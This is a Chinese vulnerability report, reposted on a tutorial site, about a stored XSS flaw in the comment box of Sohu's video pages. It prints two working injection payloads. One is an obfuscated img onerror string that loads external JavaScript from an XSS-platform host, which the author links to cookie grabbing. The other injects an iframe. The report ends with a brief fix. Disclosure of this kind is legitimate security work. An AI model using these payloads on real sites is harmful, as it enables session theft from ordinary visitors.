来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 想看《中国好声音》其他视频网站貌似没有播放版权,就去搜狐看了,看的人真多,流量很大。这位置要是有个XSS那是不是很给力,而且还能调用任意外部js文件~详细说明:真没想到诶...
|
想看《中国好声音》其他视频网站貌似没有播放版权,就去搜狐看了,看的人真多,流量很大。这位置要是有个XSS那是不是很给力,而且还能调用任意外部js文件~
详细说明:真没想到诶,评论框位置居然存在xss,而且是基本啥都没过滤的那种。
可以随意调用外部js文件。
sae有些问题xsser.me暂时用不了,没法截抓取cookie的图了。
危害:看下面第一个图,此利用代码插入后,只要有一个人回复,原网页就会多生成一条script调用外部js的代码,所以不存在xss留言被刷的不显示了,xss代码就失效的问题。
漏洞证明:诶,刷评论的人太多了,截图难度略大,还好我手快截图了两张。
1 调用外部js文件。插入的利用代码
<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">
 2 插入百度首页。插入的利用代码
<textarea/><iframe src=http://www.baidu.com/></iframe>
 修复方案: 过滤xss特殊字符 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
